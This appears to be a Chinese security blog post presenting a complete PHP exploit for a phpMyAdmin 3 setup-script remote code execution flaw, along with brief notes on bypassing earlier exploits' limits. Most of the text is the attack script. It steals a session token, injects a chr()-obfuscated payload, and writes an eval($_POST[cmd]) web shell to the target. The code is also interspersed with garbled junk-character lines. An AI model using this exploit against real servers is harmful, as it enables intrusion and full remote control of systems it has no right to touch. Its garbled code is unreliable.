最近在家做专职奶爸,不问圈内事已经好几个月了,博客也没有更新。

昨夜带孩子整夜未眠,看到黑哥在 php security 群里关于 phpMyAdmin 3 漏洞的讨论。虽然之前没看过漏洞代码,不过前段时间在微博上看到过 wofeiwo 的 exp;据黑哥说还有不那么鸡肋的利用方法,于是夜里翻出代码研究了一番,写出了这个冷饭 exp。由于我动手晚了,之前已经有很多人研究并写了 exp,所以我这个属于炒冷饭,权当研究研究、打发时间。
首先赞一下 wofeiwo 的 python 版本 exp,再赞一下 wofeiwo 跟 superhei 的钻研精神,是学习的榜样。不过之前那个 exp 利用起来有一些限制:
一是需要 session.auto_start = 1;
二是 pma3 默认代码里 libraries 目录已经用 .htaccess 限制为不允许访问。
当然还有第三点,这是谁都绕不过去的鸿沟:config 目录必须存在且可写。(反过来说,安装完成后删除 config 目录或去掉它的写权限,就能堵住这条利用路径。)
在群里看了黑哥的发言后,再看了下代码,发现前两点限制都可以绕过,所以这个漏洞其实并没有那么鸡肋。(从下面的代码可以看到:先从 index.php 拿到 session cookie 和 token,再通过 pma 根目录下的 db_create.php 而不是 libraries 下的文件去写 session。)

于是写了这个 php 版本的 exp,代码如下:
#!/usr/bin/php
' X) t( r& c9 e0 U% f* n3 p<?php
" ^. h( ]4 g' Sprint_r(') s, [. `( O6 I3 b4 |! L
+---------------------------------------------------------------------------+
% ]# G0 Q) G& y, Upma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]; g; Z$ s% w' R" I+ u
by oldjun(www.oldjun.com)
/ U, @( z0 h9 ~1 C' wwelcome to www.t00ls.net( s/ @9 o a* b4 F
mail: oldjun@gmail.com
4 i v7 T5 y Y2 q5 BAssigned CVE id: CVE-2011-25058 Y) v1 n. o( G7 Q# H' K- d
+---------------------------------------------------------------------------+$ c9 g9 K q: U! S. u9 Y
');+ P8 ?; }4 J- V, z# w0 Y$ c% V! i
% z8 X/ r$ W0 }. ], T% S: H2 ^/**
9 D& E7 z2 x- v( V * working when the directory:"config" exists and is writeable.6 n# I% r {- H
**/
]9 D8 h( L" D& t2 D, C 2 i: [0 g4 L+ Y) G
if ($argc < 3) {# {8 b- q2 K7 B b7 B* w
print_r('
2 S8 ~ a+ ~$ B$ b4 b$ [) O+---------------------------------------------------------------------------+
9 @+ A% V8 x) R% J5 c# pUsage: php '.$argv[0].' host path w) y/ y6 h7 X2 N* U7 ]( l
host: target server (ip/hostname)2 B. [% M4 |+ f$ b
path: path to pma3
% S+ L& G' V, K; d4 q4 V, @7 W/ _% {Example:
- h! Z' i$ A# Y/ Qphp '.$argv[0].' localhost /pma/3 H9 @. _7 S( ]
+---------------------------------------------------------------------------+. m& E' \! {% N4 d' k1 w
');
9 v3 U% J% @. B& g1 P* `/ z# i exit;
( C2 n% L; {+ m}
8 f" N8 C4 ^+ y. o, m
; V: n- t! u1 t. Z$host = $argv[1];
, r2 u6 f$ B; U* f8 o+ k2 h$path = $argv[2];
) x' U& ?% R( N2 h* w5 k
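/**
 * Step 1: probe for the "config" directory.
 *
 * Only a 404 on the status line is treated as "missing": a 403 (directory
 * listing denied) or a 200 both mean the directory is present. The original
 * searched for "404" anywhere in the response, which misfires on any page whose
 * body happens to contain that number, and silently continued on an empty reply.
 */
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if ($returnstr === '') {
    exit("[-] Exploit Failed! Empty response from the server.\n");
}
if (preg_match('~^HTTP/\d\.\d\s+404\b~', $returnstr)) {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}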
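/**
 * Step 2: obtain a session id and CSRF token from the login page.
 *
 * The page sets the "phpMyAdmin" session cookie and embeds a token in its links;
 * both are reused by every later request. The original printed the literal words
 * "token"/"sessionid" instead of the values and indexed $resp without checking
 * that preg_match() matched at all.
 */
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
$token = '';
$sessionid = '';
if (preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp)) {
    $sessionid = $resp[1];
    $token = $resp[3];
}
if ($token !== '' && $sessionid !== '') {
    echo "[+] token $token\n";
    echo "[+] Session ID $sessionid\n";
} else {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}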
/**
 * Step 3: plant the payload in the server-side session.
 *
 * The request carries the session cookie plus a GET parameter whose name is a
 * _SESSION[ConfigFile][Servers][...] path. The chr() run in the key decodes to
 *   fputs(fopen('a.php','w'),'<?php eval($_POST[cmd])?>');echo('t00ls');
 * and is wrapped in "*\/ ... \/*" -- presumably so it breaks out of a comment when
 * the setup script later serialises the server entry into config.inc.php
 * (NOTE(review): confirm against the pma setup code). Author's note: almost any
 * php file in pma's home directory works as the endpoint, not just db_create.php.
 */
echo "[+] Try to insert shell into session....\n";
$poisonedKey = '_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net';
$poisonUrl = 'db_create.php?token=' . $token . '&session_to_unset=t00ls&' . $poisonedKey;
php_request($poisonUrl, '', 'phpMyAdmin=' . $sessionid);
/**
 * Step 4: ask the setup page to save its configuration.
 *
 * POSTs the same form fields as the original, built with http_build_query();
 * the session id and token are \w-only (see the extraction regex), so the
 * encoded body is byte-identical to the hand-written string.
 */
echo "[+] Try to create webshell....\n";
$saveForm = http_build_query(array(
    'phpMyAdmin'         => $sessionid,
    'tab_hash'           => '',
    'token'              => $token,
    'check_page_refresh' => '',
    'DefaultLang'        => 'en',
    'ServerDefault'      => '0',
    'eol'                => 'unix',
    'submit_save'        => 'Save',
));
php_request('setup/config.php', $saveForm, 'phpMyAdmin=' . $sessionid);
/**
 * Step 5: verify the result.
 *
 * Requesting config/config.inc.php executes it; the payload's echo('t00ls')
 * appears in the body only if our code was written into the file. The marker
 * can never be at offset 0 because the response starts with the status line,
 * so "offset > 0" is the same test as the original truthiness check.
 */
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
$markerAt = strpos($content, 't00ls');
if ($markerAt === false || $markerAt === 0) {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}
echo "[+] Congratulations! Expoilt successfully....\n";
// a.php is created relative to config.inc.php, i.e. inside config/ (presumably; verify on target).
echo "[+] Webshell:http://{$host}{$path}config/a.php eval(\$_POST[cmd])\n";
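/**
 * Send one raw HTTP/1.1 request to the target and return the full response
 * (status line, headers and body) as a string.
 *
 * @param string $url    path relative to the phpMyAdmin root ($path)
 * @param string $data   urlencoded body; non-empty means POST, otherwise GET
 * @param string $cookie Cookie header value, sent only when non-empty
 * @param int    $port   TCP port (new, optional; defaults to the original 80)
 * @return string raw response, '' if the server closed without sending anything
 *
 * Reads $host and $path from the script's globals, as the callers expect.
 * Terminates the script when the TCP connection cannot be opened.
 *
 * Fixes vs. the original: the socket was never closed; fsockopen() failures
 * carried no reason; a body of "0" would have been sent as a GET.
 */
function php_request($url, $data = '', $cookie = '', $port = 80)
{
    global $host, $path;

    // Compare against '' rather than truthiness so a body of "0" still POSTs.
    $isPost = ($data !== '');
    $method = $isPost ? 'POST' : 'GET';

    $lines = array(
        $method . ' ' . $path . $url . ' HTTP/1.1',
        'Accept: */*',
        'User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)',
        'Host: ' . $host,
    );
    if ($isPost) {
        $lines[] = 'Content-Type: application/x-www-form-urlencoded';
        $lines[] = 'Content-Length: ' . strlen($data); // byte length, as HTTP requires
    }
    if ($cookie !== '') {
        $lines[] = 'Cookie: ' . $cookie;
    }
    // "Connection: Close" lets the read loop below use EOF as end-of-response.
    $lines[] = 'Connection: Close';
    $packet = implode("\r\n", $lines) . "\r\n\r\n" . ($isPost ? $data : '');

    // fsockopen() resolves hostnames itself, so the old gethostbyname() wrapper
    // was redundant; a connect timeout keeps a silent host from hanging the run.
    $errno = 0;
    $errstr = '';
    $fp = fsockopen($host, $port, $errno, $errstr, 10);
    if (!$fp) {
        echo "No response from $host ($errno: $errstr)\n";
        die;
    }

    $resp = '';
    if (fwrite($fp, $packet) !== false) {
        while (!feof($fp)) {
            $chunk = fread($fp, 1024);
            if ($chunk === false) {
                break;
            }
            $resp .= $chunk;
        }
    }
    fclose($fp);

    return $resp;
}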